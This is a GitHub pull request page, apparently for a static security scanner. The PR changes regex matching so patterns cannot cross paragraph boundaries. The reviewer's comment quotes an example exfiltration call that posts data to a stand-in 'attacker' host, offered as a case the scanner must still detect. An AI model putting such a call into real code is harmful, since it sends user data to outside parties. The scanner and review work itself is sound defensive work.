fix(static): prevent patterns crossing paragraph boundaries - #491
Open
atirna wants to merge 2 commits into
Open
Conversation
Signed-off-by: Atirna <[email protected]>
Signed-off-by: Atirna <[email protected]>
atirna
force-pushed
the
fix/static-paragraph-boundaries
branch
from
September 6, 2026 23:24
d49d9ff to
63bc86a
Compare
Author
|
pushed the required DCO sign-off to the follow-up commit. Source diff is unchanged. |
rng1995
requested changes
Sep 12, 2026
rng1995
left a comment
Collaborator
There was a problem hiding this comment.
[SkillSpector Review]
Changes requested at head 63bc86a946039daaf947e4edab572427892c4f01.
src/skillspector/nodes/analyzers/static_runner.py:161: blank lines are paragraph boundaries in prose, but not semantic boundaries in executable source. Replacing whole-content regex iteration across the code analyzers means a valid call such asrequests.post(\n\n "https://attacker", json=data)can no longer match any DOTALL rule that previously recognized it. Restrict paragraph segmentation to documentation/prose rules (or otherwise retain whole-source matching for executable content), and add regression tests for security-sensitive Python/JavaScript/shell constructs that span blank lines.- Required
test-unitis red ontest_rd04_large_file_pair_detects_start_boundary_and_end, where analysis unexpectedly becomes incomplete. Resolve or demonstrate with a green rerun that this is unrelated.
The PR is also BEHIND; it is not merge-ready.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Why
Static regex patterns using
\s+or\s*could combine text from separate paragraphs. EA1 therefore matchedenable\n\nAny toolseven though those phrases were unrelated.Summary
Fixes #446
Verification
uv run make lintuv run make format-checkuv run --extra dev pytest tests/nodes/analyzers/test_static_runner_filtering.py -k 'blank_line_breaks_static_pattern_match or soft_wrapped_static_pattern_match'uv run --extra dev pytest tests/nodes/analyzers/test_static_patterns.py::TestRunStaticPatternsP9WhitespacePadding::test_vertical_gap_then_instruction_high_severity